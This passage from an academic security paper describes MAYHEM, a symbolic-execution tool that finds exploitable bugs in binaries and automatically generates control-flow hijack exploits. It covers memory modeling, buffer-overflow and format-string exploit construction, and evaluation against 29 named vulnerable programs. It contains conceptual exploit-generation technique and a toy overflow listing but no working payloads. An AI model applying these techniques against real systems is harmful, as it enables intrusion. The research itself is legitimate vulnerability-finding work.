concretize the index to a single specific address. This
concretization can reduce the complexity of the produced
formulas and improve solving/exploration times. However,constraining the index to a single value may cause us tomiss paths—for instance, if they depend on the value of
the index. Concretization is the natural choice for offline
executors, such as SAGE [ 13] or BitBlaze [ 5], since only a
single memory address is accessed during concrete execution.
Reasoning about all possible indices is also possible by
treating memory as fully symbolic. For example, tools such
as McV eto [ 27], BAP [ 15] and BitBlaze [ 5] offer capabilities
to handle symbolic memory. The main tradeoff—when
compared with the concretization approach—is performance.
Formulas involving symbolic memory are more expressive,
thus solving/exploration times are usually higher.B. Memory Modeling in MAY H E M
The first implementation of M A YHEM followed the simple
concretization approach and concretized all memory indices.
This decision proved to be severely limiting in that selecting
a single address for the index usually did not allow us to
satisfy the exploit payload constraints. Our experiments show
that 40% of the examples require us to handle symbolic
memory—simple concretization was insufficient (see §VIII).
The alternative approach was symbolic memory. To avoid
the scalability problems associated with fully symbolic
memory, M A YHEM models memory partially, where writes
are always concretized, but symbolic reads are allowed to be
modeled symbolically. In the rest of this section we describe
the index-based memory model of M AY H E M in detail, as
well as some of the key optimizations.
Memory Objects. To model symbolic reads, M A YHEM
introduces memory objects. Similar to the global memory μ,
a memory object M is also a map from 32-bit indices to
expressions. Unlike the global memory however, a memory
object is immutable. Whenever a symbolic index is used to
read memory, M AY H E M generates a fresh memory object
M that contains all values that could be accessed by the
index—M is a partial snapshot of the global memory.
Using the memory object, M A YHEM can reduce the
evaluation of a load(μ ,i)expression to M[i]. Note, that
this is semantically equivalent to returning μ[i]. The key
difference is in the size of the symbolic array we introduce
in the formula. In most cases, the memory object M will
be orders of magnitude smaller than the entire memory μ.
Memory Object Bounds Resolution. Instantiating the mem-
ory object requires M AY H E M to find all possible values of
a symbolic index i. In the worst case, this may require up
to232queries to the solver (for 32-bit memory addresses).
To tackle this problem M A YHEM exchanges some accuracy
for scalability by resolving the bounds [L,U]of the memory
region—where Lis the lower and Uis the upper bound of the
index. The bounds need to be conservative, i.e., all possible
values of the index should be within the [L,U]interval. Note
that the memory region does not need to be continuous, for
exampleimight have only two realizable values ( LandU).
To obtain these bounds M AY H E M uses the solver to
perform binary search on the value of the index in the context
of the current path predicate. For example, initially for the
lowest bound of a 32-bit i:L∈[0,232−1].I fi<232−1
2
is satisfiable then L∈[0,232−1
2−1]while unsatisfiability
indicates that L∈ [232−1
2,232−1]. We repeat the process
until we recover both bounds. Using the bounds we can now
instantiate the memory object (using a fresh symbolic array
M) as follows: ∀i∈[L,U]:M[i]=μ[i].
The bounds resolution algorithm described above is
sufficient to generate a conservative representation of memory
objects and allow M AY H E M to reason about symbolic
memory reads. In the rest of the section we detail the main
386
memory indexvalue
value
valueite( n < 91,  ite( n < 64, n, n + 32 ), n )
64 91 memory index 64 91 memory index 64 91
(a) to_lower conversion table (b) Index search tree (c) Linearizationite( n < 128, L, R )
L = ite( n < 64, ... ) R = ite( n < 192, ... )
Figure 5: Figure (a) shows the to_lower conversion table, (b) shows the generated IST, and (c) the IST after linearization.
optimization techniques M A YHEM includes to tackle some
of the caveats of the original algorithm:
•Querying the solver on every symbolic memory derefer-
ence is expensive. Even with binary search, identifying
both bounds of a 32-bit index required ∼54queries on
average (§VIII) (§V -B1,§V -B2,§V -B3).
•The memory region may not be continuous. Even though
many values between the bounds may be infeasible, they
are still included in the memory object, and consequently,
in the formula (§V -B2).
•The values within the memory object might have structure.
By modeling the object as a single byte array we are
missing opportunities to optimize our formulas based on
the structure. (§V -B4,§V -B5).
•In the worst case, a symbolic index may access any
possible location in memory (§V -C).
1) Value Set Analysis (VSA): MA YHEM employs an online
version of VSA [ 4] to reduce the solver load when resolving
the bounds of a symbolic index ( i). VSA returns a strided
interval for the given symbolic index. A strided intervalrepresents a set of values in the form
S[L,U], whereSis
the stride and L,Uare the bounds. For example, the interval
2[1,5]represents the set {1,3,5}. The strided interval output
by VSA will be an over-approximation of all possible values
the index might have. For instance, i=( 1+byte)<<1—
wherebyte is a symbolic byte with an interval 1[0,255] —
results in an interval: VSA (i) = 2[2, 512] .
The strided interval produced by VSA is then refined by the
solver (using the same binary-search strategy) to get the tightlower and upper bounds of the memory object. For instance,if the path predicate asserts that
byte < 32, then the interval
for the index (1 +byte)<< 1can be refined to 2[2,64].
Using VSA as a preprocessing step has a cascading effect on
our memory modeling: a) we perform 70% less queries to
resolve the exact bounds of the memory object ( §VIII), b) the
strided interval can be used to eliminate impossible values
in the [L,U]region, thus making formulas simpler, and c)
the elimination can trigger other optimizations (see §V -B5).2) Refinement Cache: Every VSA interval is refined using
solver queries. The refinement process can still be expensive
(for instance, the over-approximation returned by VSA might
be too coarse). To avoid repeating the process for the same
intervals, M A YHEM keeps a cache mapping intervals to
potential refinements. Whenever we get a cache hit, we query
the solver to check whether the cached refinement is accurate
for the current symbolic index, before resorting to binary-
search for refinement. The refinement cache can reduce the
number of bounds-resolution queries by 82% (§VIII).
3) Lemma Cache: Checking an entry of the refinement
cache still requires solver queries. M AY H E M uses another
level of caching to avoid repeatedly querying α-equivalent
formulas, i.e., formulas that are structurally equivalent up
to variable renaming. To do so, M AY H E M converts queried
formulas to a canonical representation (F) and caches thequery results (Q) in the form of a lemma:
F→Q. The
answer for any formula mapping to the same canonical
representation is retrieved immediately from the cache. The
lemma cache can reduce the number of bounds-resolution
queries by up to 96% ( §VIII). The effectiveness of this cache
depends on the independent formulas optimization §IV -E . The
path predicate has to be represented as a set of independent
formulas, otherwise any new formula addition to the current
path predicate would invalidate all previous entries of the
lemma cache.
4) Index Search Trees (ISTs): Any value loaded from
a memory object M is symbolic. To resolve constraints
involving a loaded value ( M[i]), the solver needs to both
find an entry in the object that satisfies the constraints and
ensure that the index to the object entry is realizable. To
lighten the burden on the solver, M AY H E M replaces memory
object lookup expressions with index search trees (ISTs).A n
IST is a binary search tree where the symbolic index is the
key and the leaf nodes contain the entries of the object. The
entire tree is encoded in the formula representation of the
load expression.
More concretely, given a (sorted by address) list of
387
entriesEwithin a memory object M, a balanced IST
for a symbolic index iis defined as: IST (E)=ite(i<
addr (Eright ),Eleft,Eright )), where ite represents an if-
then-else expression, Eleft (Eright ) represents the left (right)
half of the initial entries E, andaddr (·)returns the lowest
address of the given entries. For a single entry the IST returns
the entry without constructing any ite expressions.
Note that the above definition constructs a balanced
IST. We could instead construct the IST with nested ite
expressions—making the formula depth O(n) in the num-
ber of object entries instead of O(logn). However, our
experimental results show that a balanced IST is 4× faster
than a nested IST ( §VIII). Figure 5 shows how M A YHEM
constructs the IST when given the entries of a memory object
(theto_lower conversion table) with a single symbolic
character as the index.
5) Bucketization with Linear Functions: The IST gener-
ation algorithm creates a leaf node for each entry in the
memory object. To reduce the number of entries, M AY H E M
performs an extra preprocessing step before passing the object
to the IST. The idea is that we can use the memory object
structure to combine multiple entries into a single bucket .A
bucket is an index-parameterized expression that returns the
value of the memory object for every index within a range.
MA YHEM uses linear functions to generate buckets. Specif-
ically, M AY H E M sweeps all entries within a memory object
and joins consecutive points ( ⟨index,value⟩ tuples) into
lines, a process we call linearization. Any two points can form
a liney=αx+β. Follow-up points ⟨ii,vi⟩will be included
in the same line if ui=αii+β. At the end of linearization,
the memory object is split into a list of buckets, where eachbucket is either a line or an isolated point. The list of bucketscan now be passed to the IST algorithm. Figure 5 shows the
to_lower IST after applying linearization. Linearization
effectively reduces the number of leaf nodes from 256 to 3.
The idea of using linear functions to simplify memory
lookups comes from a simple observation: linear-like patterns
appear frequently for several operations at the binary level.
For example, jump tables generated by switch statements,conversion and translation tables (e.g., ASCII to Unicodeand vice versa) all contain values that are scaling linearly
with the index.
C. Prioritized Concretization.
Modeling a symbolic load using a memory object is
beneficial when the size of the memory object is significantly
smaller than the entire memory ( |M| ≪ |μ |). Thus, the
above optimizations are only activated when the size of
the memory object, approximated by the range, is below a
threshold (|M| <1024 in our experiments).
Whenever the memory object size exceeds the threshold,
MAY H E M will concretize the index used to access it.
However, instead of picking a satisfying value at random,
MA YHEM attempts to prioritize the possible concretization1typedef struct {
2 int value ;
3 char∗bar ;
4}foo ;
5int vulnerable ( char∗input )
6{
7 foo∗ ptr = init ;
8 buffer [100];
9 strcpy ( buffer , input ) ;
10 buffer [0] = ptr −>bar [0];
11 return 0;
12}bar *
ptr *value
symbolic
region 1
buffersymbolic
region 2symbolic
region 3
Figure 6: M A YHEM reconstructing symbolic data structures.
values. Specifically, for every symbolic pointer, M A YHEM
performs three checks:
1) Check if it is possible to redirect the pointer to unmapped
memory under the context of the current path predicate.
If true, M A YHEM will generate a crash test case for the
satisfying value.
2) Check if it is possible to redirect the symbolic pointerto symbolic data. If it is, M
A YHEM will redirect (and
concretize) the pointer to the least constrained region of
the symbolic data. By redirecting the pointer towards theleast constrained region, M
A YHEM tries to avoid loading
overconstrained values, thus eliminating potentially inter-
esting paths that depend on these values. To identify the
least constrained region, M AY H E M splits memory into
symbolic regions, and sorts them based on the complexity
of constraints associated with each region.
3) If all of the above checks fail, M AY H E M concretizes the
index to a valid memory address and continues execution.
The above steps infer whether a symbolic expression is a
pointer, and if so, whether it is valid or not (e.g., NULL).For example, Figure 6 contains a buffer overflow at line
9. However, an attacker is not guaranteed to hijack control
even if strcpy overwrites the return address. The program
needs to reach the return instruction to actually transfercontrol. However, at line 10 the program performs twodereferences both of which need to succeed (i.e., avoid
crashing the program) to reach line 11 (note that pointer ptr
is already overwritten with user data). M A YHEM augmented
with prioritized concretization will generate 3 distinct test
cases: 1) a crash test case for an invalid dereference of pointer
ptr, 2) a crash test case where dereferencing pointer bar
fails after successfully redirecting ptr to symbolic data, and
3) an exploit test case, where both dereferences succeed and
user input hijacks control of the program. Figure 6 shows
the memory layout for the third test case.
VI. E XPLOIT GENERA TION
MA YHEM checks for two exploitable properties: a sym-
bolic (tainted) instruction pointer, and a symbolic format
string. Each property corresponds to a buffer overflow and
format string attack respectively. Whenever any of the two
388
exploitable policies are violated, M AY H E M generates an
exploitability formula and tries to find a satisfying answer,
i.e., an exploit.
MA YHEM can generate both local and remote attacks.
Our generic design allows us to handle both types of
attacks similarly. For Windows, M A YHEM detects overwritten
Structured Exception Handler (SEH) on the stack when an
exception occurs, and tries to create an SEH-based exploit.
Buffer Overflows: MAY H E M generates exploits for any
possible instruction-pointer overwrite, commonly triggered
by a buffer overflow. When M AY H E M finds a symbolic
instruction pointer, it first tries to generate jump-to-register
exploits, similar to previous work [ 14]. For this type of
exploit, the instruction pointer should point to a trampoline,
e.g.jmp %eax , and the register, e.g. %eax , should point
to a place in memory where we can place our shellcode.
By encoding those constraints into the formula, M A YHEM
is able to query the solver for a satisfying answer. If an
answer exists, we proved that the bug is exploitable. If we
can’t generate a jump-to-register exploit, we try to generate
a simpler exploit by making the instruction pointer point
directly to a place in memory where we can place shellcode.
F ormat String Attacks: To identify and generate format
string attacks, M A YHEM checks whether the format argument
of format string functions, e.g., printf , contains any
symbolic bytes. If any symbolic bytes are detected, it tries
to place a format string payload within the argument that
will overwrite the return address of the formatting function.
VII. I MPLEMENT A TION
MA YHEM consists of about 27,000 lines of C/C++ and
OCaml code. Our binary instrumentation framework was built
on Pin [ 18] and all the hooks for modeled system and API
calls were written in C/C++. The symbolic execution engine
is written solely in OCaml and consists of about 10,000 lines
of code. We rely on BAP [ 15] to convert assembly instructions
to the IL. We use Z3 [ 12] as our decision procedure, for which
we built direct OCaml bindings. To allow for remote com-
munication between the two components we implemented
our own cross-platform, light-weight RPC protocol (both in
C++ and OCaml). Additionally, to compare between differentsymbolic execution modes, we implemented all three: online,
offline and hybrid.
VIII. E V ALUA TION
A. Experimental Setup
We evaluated our system on 2 virtual machines running
on a desktop with a 3.40GHz Intel(R) Core i7-2600 CPUand 16GB of RAM. Each VM had 4GB RAM and was
running Debian Linux (Squeeze) VM and Windows XP SP3
respectively.0.0 x 1002.0 x 1054.0 x 1056.0 x 1058.0 x 1051.0 x 1061.2 x 1061.4 x 1061.6 x 1061.8 x 1062.0 x 106
 0  500  1000  1500  2000  2500  3000Memory Use (Bytes)
Time (sec.)online
hybrid
offline
Figure 7: Memory use in online, offline, and hybrid mode.
B. Exploitable Bug Detection
We downloaded 29 different vulnerable programs to check
the effectiveness of M AY H E M . Table I summarizes our
results. Experiments were performed on stripped unmodified
binaries on both Linux and Windows. One of the Windows
applications M AY H E M exploited ( Dizzy ) was a packed
binary.
Column 3 shows the type of exploits that M A YHEM
detected as we described in §VI. Column 4 shows the
symbolic sources that we considered for each program.
There are examples from all the symbolic input sources
that M A YHEM supports, including command-line arguments
(Arg.), environment variables (Env. V ars), network packets
(Network) and symbolic files (Files). Column 5 is the size
of each symbolic input. Column 6 describes the precondition
types that we provided to M A YHEM , for each of the 29
programs. They are split into three categories: length, prefix
and crashing input as described in §IV -D. Column 7 shows
the advisory reports for all the demonstrated exploits. Infact, M
AY H E M found 2 zero-day exploits for two Linux
applications, both of which we reported to the developers.
The last column contains the exploit generation time for
the programs that M A YHEM analyzed. We measured the
exploit generation time as the time taken from the start
of analysis until the creation of the first working exploit.
The time required varies greatly with the complexity of
the application and the size of symbolic inputs. The fastest
program to exploit was the Linux wireless configuration
utility iwconfig in 1.90 seconds and the longest was the
Windows program Dizzy, which took about 4 hours.
C. Scalability of Hybrid Symbolic Execution
We measured the effectiveness of hybrid symbolic execu-
tion across two scaling dimensions: memory use and speed.
Less Memory-Hungry than Online Execution. Figure 7
shows the average memory use of M AY H E M over time
while analyzing a utility in coreutils ( echo ) with online,
offline and hybrid execution. After a few minutes, online
389
Program Exploit TypeInput
SourceSymbolic
Input SizeSymb.
Mem.Precondition Advisory ID.Exploit Gen.
Time (s)LinuxA2ps Stack Overflow Env. V ars 550 crashing EDB-ID-816 189
Aeon Stack Overflow Env. V ars 1000 length CVE-2005-1019 10
Aspell Stack Overflow Stdin 750 crashing CVE-2004-0548 82
Atphttpd Stack Overflow Network 800 ✓ crashing CVE-2000-1816 209
FreeRadius Stack Overflow Env. 9000 length Zero-Day 133
GhostScript Stack Overflow Arg. 2000 prefix CVE-2010-2055 18
Glftpd Stack Overflow Arg. 300 length OSVDB-ID-16373 4
Gnugol Stack Overflow Env. 3200 length Zero-Day 22
Htget Stack Overflow Env. vars 350 ✓ length N/A 7
Htpasswd Stack Overflow Arg. 400 ✓ prefix OSVDB-ID-10068 4
Iwconfig Stack Overflow Arg. 400 length CVE-2003-0947 2
Mbse-bbs Stack Overflow Env. vars 4200 ✓ length CVE-2007-0368 362
nCompress Stack Overflow Arg. 1400 length CVE-2001-1413 11
OrzHttpd Format String Network 400 length OSVDB-ID-60944 6
PSUtils Stack Overflow Arg. 300 length EDB-ID-890 46
Rsync Stack Overflow Env. V ars 100 ✓ length CVE-2004-2093 8
SharUtils Format String Arg. 300 prefix OSVDB-ID-10255 17
Socat Format String Arg. 600 prefix CVE-2004-1484 47
Squirrel Mail Stack Overflow Arg. 150 length CVE-2004-0524 2
Tipxd Format String Arg. 250 length OSVDB-ID-12346 10
xGalaga Stack Overflow Env. V ars 300 length CVE-2003-0454 3
Xtokkaetama Stack Overflow Arg. 100 crashing OSVDB-ID-2343 10WindowsCoolplayer Stack Overflow Files 210 ✓ crashing CVE-2008-3408 164
Destiny Stack Overflow Files 2100 ✓ crashing OSVDB-ID-53249 963
Dizzy Stack Overflow (SEH) Arg. 519 ✓ crashing EDB-ID-15566 13,260
GAlan Stack Overflow Files 1500 ✓ prefix OSVDB-ID-60897 831
GSPlayer Stack Overflow Files 400 ✓ crashing OSVDB-ID-69006 120
Muse Stack Overflow Files 250 ✓ crashing OSVDB-ID-67277 481
Soritong Stack Overflow (SEH) Files 1000 ✓ crashing CVE-2009-1643 845
Table I: List of programs that M AY H E M demonstrated as exploitable.
execution reaches the maximum number of live interpreters
and starts terminating execution paths. At this point, the
memory keeps increasing linearly as the paths we explore
become deeper. Note that at the beginning, hybrid execution
consumes as much memory as online execution without
exceeding the memory threshold, and utilizes memory
resources more aggressively than offline execution throughout
the execution. Offline execution requires much less memory
(less than 500KB on average), but at a performance cost, as
demonstrated below.
Faster than Offline Execution. Figure 8 shows the explo-
ration time for /bin/echo using different limits on the
maximum number of running executors. For this experiment,
we use 6 bytes of symbolic arguments to explore the entire
input space in a reasonable amount of time. When themaximum number of running executors is 1, it means 0 200 400 600 800 1000 1200 1400
1 2 4 8 16 32 64 128Time to cover all paths (sec.)
Maximum number of running executorsRe-execution Time
Exploration Time
Figure 8: Exploration times for different limits on the
maximum number of running executors.
MAY H E M will produce a disk checkpoint—the average
checkpoint size was 30KB—for every symbolic branch,
390
L Hits R Hits Misses # Queries Time (sec)
No opt. N/A N/A N/A 217,179 1,841
+ VSA N/A N/A N/A 49,424 437
+ R cache N/A 3996 7 10,331 187
+ L cache 3940 56 7 242 77
Table II: Effectiveness of bounds resolution optimizations.
The L and R caches are respectively the Lemma and
Refinement caches as defined in §V.
thus is equivalent to offline execution. When the maximum
number of running executors was 128 or above, M A YHEM
did not have to checkpoint to disk, thus is equivalent to an
online executor. As a result, online execution took around 25
seconds to explore the input space while offline executionneeded 1,400 seconds. Online was 56
×faster than offline
in this experiment. We identified two major reasons for this
performance boost.
First, the re-execution cost is higher than context-switching
between two execution states ( §IV -B ). M A YHEM spent more
than 25% of the time re-executing previous paths in the
offline scheme. For the online case, 2% of the time was spent
context-switching. Second, online is more cache-efficientthan offline execution in our implementation. Specifically,online execution makes more efficient use of the Pin code
cache [ 18] by switching between paths in-memory during a
single execution. As a result, the code cache made online
execution 40× faster than offline execution.
Additionally, we ran a Windows GUI program
(MiniShare ) to compare the throughput between offline
and hybrid execution. We chose this program because it
does not require user interaction (e.g., mouse click), to start
symbolic execution. We ran the program for 1 hour for each
execution mode. Hybrid execution was 10 ×faster than offline
execution.
D. Handling Symbolic Memory in Real-World Applications
Recall from §V, index-based memory modeling enables
MA YHEM to reason about symbolic indices. Our experiments
from Table I show that more than 40% of the programs
required symbolic memory modeling (column 6) to exploit. Inother words, M
A YHEM —after several hours of analysis—was
unable to generate exploits for these programs without index-
based memory modeling. To understand why, we evaluated
our index-based memory modeling optimizations on the
atphttpd server.
Bounds Resolution Table II shows the time taken by
MAY H E M to find a vulnerability in atphttpd using different
levels of optimizations for the bounds resolution algorithm.
The times include exploit detection but not exploit generation
time (since it is not affected by the bounds resolution
algorithm). Row 3 shows that VSA reduces the averagenumber of queries to the SMT solver from
∼54 to∼14Formula Representation Time (sec.)
Unbalanced binary tree 1,754
Balanced binary tree 425
Balanced binary tree + Linearization 192
Table III: Performance comparison for different IST repre-
sentations.
 0 20 40 60 80 100
 0  500  1000  1500  2000  2500  3000  3500Code Coverage (%)
Time (sec.)
Figure 9: Code coverage achieved by M AY H E M as time
progresses for 25 coreutils applications.
queries per symbolic memory access, and reduces the total
time by 75%.
Row 4 shows shows the number of queries when the
refinement cache (R cache) is enabled on top of VSA. The
R cache reduces the number of necessary binary searches to
from 4003 to 7, resulting in a 57% speedup. The last row
shows the effect of the lemma cache (L cache) on top of the
other optimizations. The L cache takes most of the burden
off the R cache, thus resulting in an additional 59% speedup.
We do not expect the L cache to always be that efficient,
since it relies heavily on the independence of formulas in
the path predicate. The cumulative speedup was 96%.Index Search Tree Representation.
Recall from §V- B
MA YHEM models symbolic memory loads as ISTs. To show
the effectiveness of this optimization we ran atphttpd with
three different formula representations (shown in Table III).
The balanced IST was more than 4× faster than the
unbalanced binary tree representation, and with linearization
of the formula we obtained a cumulative 9× speedup. Note,
that with symbolic arrays (no ISTs) we were unable to detect
an exploit within the time limit.
E. MA YHEM Coverage Comparison
To evaluate M AY H E M ’s ability to cover new paths, we
downloaded an open-source symbolic executor (KLEE) to
compare the performance against M AY H E M . Note KLEE
runs on source, while M A YHEM on binary.
We measured the code coverage of 25 coreutils applications
as a function of time. M A YHEM ran for one hour, at most,
on each of those applications. We used the generated testcases to measure the code coverage using the GNU gcov
391
AEG MAYHEM
Program Time LL VM Time ASM Tainted ASM Tained IL
iwconfig 0.506s 10,876 1.90s 394,876 2,200 12,893
aspell 8.698s 87,056 24.62s 696,275 26,647 133,620
aeon 2.188s 18,539 9.67s 623,684 7,087 43,804
htget 0.864s 12,776 6.76s 576,005 2,670 16,391
tipxd 2.343s 82,030 9.91s 647,498 2,043 19,198
ncompress 5.511s 60,860 11.30s 583,330 8,778 71,195
Table IV: AEG comparison: binary-only execution requires
more instructions.
 0 500 1000 1500 2000 2500 3000 3500
 50  60  70  80  90  100Exploit generation time (sec.)
Normalized precondition size (%)timeout
xtokkaetama
sharutils
ghostscript
socat
htpasswd
a2ps
Figure 10: Exploit generation time versus precondition size.
utility. The results are shown in Figure 9.
We used the 21 tools with the smallest code size, and 4
bigger tools that we selected. M A YHEM achieved a 97.56%
average coverage per application and got 100% coverage on
13 tools. For comparison, KLEE achieved 100% coverage
on 12 coreutils without simulated system call failures (to
have the same configuration as M A YHEM ). Thus, M AY H E M
seems to be competitive with KLEE for this data set. Note
that M A YHEM is not designed specifically for maximizing
code coverage. However, our experiments provide a rough
comparison point against other symbolic executors.
F . Comparison against AEG
We picked 8 different programs from the AEG working
examples [ 2] and ran both tools to compare exploit generation
times on each of those programs using the same configuration
(Table IV). M A YHEM was on average 3.4 ×slower than AEG.
AEG uses source code, thus has the advantage of operating at
a higher-level of abstraction. At the binary level, there are no
types and high-level structures such as functions, variables,
buffers and objects. The number of instructions executed
(Table IV) is another factor that highlights the difference
between source and binary-only analysis. Considering this,
we believe this is a positive and competitive result for
MA YHEM .
Precondition Size. As an additional experiment, we mea-
sured how the presence of a precondition affects exploit
generation times. Specifically, we picked 6 programs thatrequire a crashing input to find an exploitable bug and
started to iteratively decrease the size of the precondition and 0 0.5 1 1.5 2 2.5 3 3.5 4 4.5 5Number of tainted instructions (%)24 different Linux applications
Figure 12: Tainted instructions (%) for 24 Linux applications.
measured exploit generation times. Figure 10 summarizesour results in terms of normalized precondition sizes—for
example, a normalized precondition of 70% for a 100-byte
crashing input means that we provide 70 bytes of the crashing
input as a precondition to M AY H E M . While the behavior
appeared to be program-dependent, in most of the programs
we observed a sudden phase-transition, where the removal
of a single character could cause M A YHEM to not detect the
exploitable bug within the time limit. We believe this to be
an interesting topic for future work in the area.
G. Performance Tuning
Formula Optimizations. Recall from §IV -E MA YHEM uses
various optimization techniques to make solver queries faster.
To compare against our optimized version of M A YHEM ,w e
turned off some or all of these optimizations.
We chose 15 Linux programs to evaluate the speedup
obtained with different levels of optimizations turned on.
Figure 11 shows the head-to-head comparison (in exploit
finding and generation times) between 4 different formula
optimization options. Algebraic simplifications usually speed
up our analysis and offer an average speedup of 10% for
the 15 test programs. Significant speedups occur when the
independent formula optimization is turned on along with
simplifications, offering speedups of 10-100× .
Z3 supports incremental solving, so as an additional
experiment, we measured the exploit generation time with
Z3 in incremental mode. In most cases solving times for
incremental formulas are comparable to the times we obtain
with the independent formulas optimization. In fact, in half of
our examples (7 out of 15) incremental formulas outperform
independent formulas. In contrast to previous results, this
implies that using the solver in incremental mode can alleviatethe need for many formula simplifications and optimizations.
A downside of using the solver in incremental mode was
that it made our symbolic execution state mutable—and thus
was less memory efficient during our long-running tests.
Tainted Instructions. Only tainted instruction blocks are
evaluated symbolically by M A YHEM —all other blocks are
executed natively. Figure 12 shows the percentage of taintedinstructions for 24 programs (taken from Table I). More than95% of instructions were not tainted in our sample programs,
and this optimization gave about 8× speedup on average.
392
 1 10 100 1000 10000
iwconfig squirrel mail xgalaga glftpd orzhttpd aeon ncompress tipxd ghostscript xtokkaetama sharutils aspell socat psutils atphttpdExploit Gen. Time (sec. in logscale)Indep. Formula + Simplification
Inc. Formula + SimplificationIndep. Formula
SimplificationTimeout
Figure 11: Exploit generation time of M A YHEM for different optimizations.
IX. D ISCUSSION
Most of the work presented in this paper focuses on
exploitable bug finding. However, we believe that the main
techniques can be adapted to other application domains under
the context of symbolic execution. We also believe that
our hybrid symbolic execution and index-based memorymodeling represent new points in the design space of
symbolic execution.
We stress that the intention of M AY H E M is informing a
user that an exploitable bug exists. The exploit produced
is intended to demonstrate the severity of the problem, and
to help debug and address the underlying issue. M A YHEM
makes no effort to bypass OS defenses such as ASLR and
DEP , which will likely protect systems against exploits we
generate. However, our previous work on Q [ 25] shows that
a broken exploit (that no longer works because of ASLR
and DEP), can be automatically transformed—with high
probability—into an exploit that bypasses both defenses on
modern OSes. While we could feed the exploits generated by
MAY H E M directly into Q, we do not explore this possibility
in this paper.
Limitations: MA YHEM does not have models for all
system/library calls. The current implementation models
about 30 system calls in Linux, and 12 library calls in
Windows. To analyze larger and more complicated programs,
more system calls need to be modeled. This is an artifact of
performing per-process symbolic execution. Whole-system
symbolic executors such as S2E [ 28] or BitBlaze [ 5] can
execute both user and kernel code, and thus do not have
this limitation. The down-side is that whole-system analysis
can be much more expensive, because of the higher staterestoration cost and the time spent analyzing kernel code.
Another limitation is that M
A YHEM can currently analyze
only a single execution thread on every run. M A YHEM cannot
handle multi-threaded programs when threads interact with
each other (through message-passing or shared memory).Last, M
A YHEM executes only tainted instructions, thus it
is subject to all the pitfalls of taint analysis, including
undertainting, overtainting and implicit flows [24].
Future Work: Our experiments show that M A YHEM can
generate exploits for standard vulnerabilities such as stack-
based buffer overflows and format strings. An interestingfuture direction is to extend M AY H E M to handle more
advanced exploitation techniques such as exploiting heap-based buffer overflows, use-after-free vulnerabilities, and
information disclosure attacks. At a high level, it should be
possible to detect such attacks using safety properties similar
to the ones M AY H E M currently employs. However, it is still
an open question how the same techniques can scale and
detect such exploits in bigger programs.
X. R ELA TED WORK
Brumley et al. [ 7] introduced the automatic patch-based
exploit generation (APEG) challenge. APEG used the patch
to point out the location of the bug and then used slicing
to construct a formula for code paths from input source to
vulnerable line. M A YHEM finds vulnerabilities and vulnerable
code paths itself. In addition, APEG’s notion of an exploit is
more abstract: any input that violates checks introduced by
the path are considered exploits. Here we consider specifically
control flow hijack exploits, which were not automatically
generated by APEG.
Heelan [ 14] was the first to describe a technique that takes
in a crashing input for a program, along with a jump register,and automatically generates an exploit. Our research explores
the state space to find such crashing inputs.
AEG [ 2] was the first system to tackle the problem of both
identifying exploitable bugs and automatically generating
exploits. AEG worked solely on source code and introduced
preconditioned symbolic execution as a way to focus sym-
bolic execution towards a particular part of the search space.
MAY H E M is a logical extension of AEG to binary code. In
practice, working on binary code opens up automatic exploit
generation to a wider class of programs and scenarios.
There are several binary-only symbolic execution frame-
works such as Bouncer [ 10], BitFuzz [ 8], BitTurner [ 6]
FuzzBall [ 20], McV eto [ 27], SAGE [ 13], and S2E [ 28],
which have been used in a variety of application domains.
The main question we tackle in M AY H E M is scaling to
find and demonstrate exploitable bugs. The hybrid symbolic
execution technique we present in this paper is completely
different from hybrid concolic testing [ 19], which interleaves
random testing with concolic execution to achieve better code
coverage.
393
XI. C ONCLUSION
We presented M A YHEM , a tool for automatically finding
exploitable bugs in binary (i.e., executable) programs in an
efficient and scalable way. To this end, M A YHEM introduces
a novel hybrid symbolic execution scheme that combines
the benefits of existing symbolic execution techniques (both
online and offline) into a single system. We also present index-
based memory modeling, a technique that allows M AY H E M
to discover more exploitable bugs at the binary-level. We
used M A YHEM to analyze 29 applications and automatically
identified and demonstrated 29 exploitable vulnerabilities.
XII. A CKNOWLEDGEMENTS
We thank our shepherd, Cristian Cadar and the anonymous
reviewers for their helpful comments and feedback. This
research was supported by a DARP A grant to CyLab at
Carnegie Mellon University (N11AP20005/D11AP00262), a
NSF Career grant (CNS0953751), and partial CyLab ARO
support from grant DAAD19-02-1-0389 and W911NF-09-1-
0273. The content of the information does not necessarily
reflect the position or the policy of the Government, and no
official endorsement should be inferred.
REFERENCES
[1] “Orzhttpd, a small and high performance http server,”
http://code.google.com/p/orzhttpd/.
[2] T. Avgerinos, S. K. Cha, B. L. T. Hao, and D. Brumley, “AEG:
Automatic exploit generation,” in Proc. of the Network and
Distributed System Security Symposium, Feb. 2011.
[3] D. Babi  ́c, L. Martignoni, S. McCamant, and D. Song,
“Statically-Directed Dynamic Automated Test Generation,” in
International Symposium on Software Testing and Analysis .
New Y ork, NY , USA: ACM Press, 2011, pp. 12–22.
[4] G. Balakrishnan and T. Reps, “Analyzing memory accesses
in x86 executables.” in Proc. of the International Conference
on Compiler Construction, 2004.
[5] “BitBlaze binary analysis project,”
http://bitblaze.cs.berkeley.edu, 2007.
[6] BitTurner, “BitTurner,” http://www.bitturner.com.
[7] D. Brumley, P . Poosankam, D. Song, and J. Zheng, “Automatic
patch-based exploit generation is possible: Techniques and
implications,” in Proc. of the IEEE Symposium on Security
and Privacy, May 2008.
[8] J. Caballero, P . Poosankam, S. McCamant, D. Babic, and
D. Song, “Input generation via decomposition and re-stitching:
Finding bugs in malware,” in Proc. of the ACM Conference on
Computer and Communications Security, Chicago, IL, October
2010.
[9] C. Cadar, D. Dunbar, and D. Engler, “KLEE: Unassisted
and automatic generation of high-coverage tests for complex
systems programs,” in Proc. of the USENIX Symposium on
Operating System Design and Implementation, Dec. 2008.
[10] M. Costa, M. Castro, L. Zhou, L. Zhang, and M. Peinado,
“Bouncer: Securing software by blocking bad input,” in
Symposium on Operating Systems Principles, Oct. 2007.[11] J. R. Crandall and F. Chong, “Minos: Architectural support
for software security through control data integrity,” in Proc.
of the International Symposium on Microarchitecture, Dec.
2004.
[12] L. M. de Moura and N. Bjørner, “Z3: An efficient smt solver,”
inTACAS, 2008, pp. 337–340.
[13] P . Godefroid, M. Levin, and D. Molnar, “Automated whitebox
fuzz testing,” in Proc. of the Network and Distributed System
Security Symposium, Feb. 2008.
[14] S. Heelan, “Automatic Generation of Control Flow Hijacking
Exploits for Software Vulnerabilities,” Oxford University, Tech.
Rep. MSc Thesis, 2002.
[15] I. Jager, T. Avgerinos, E. J. Schwartz, and D. Brumley, “BAP:
A binary analysis platform,” in Proc. of the Conference on
Computer Aided V erification, 2011.
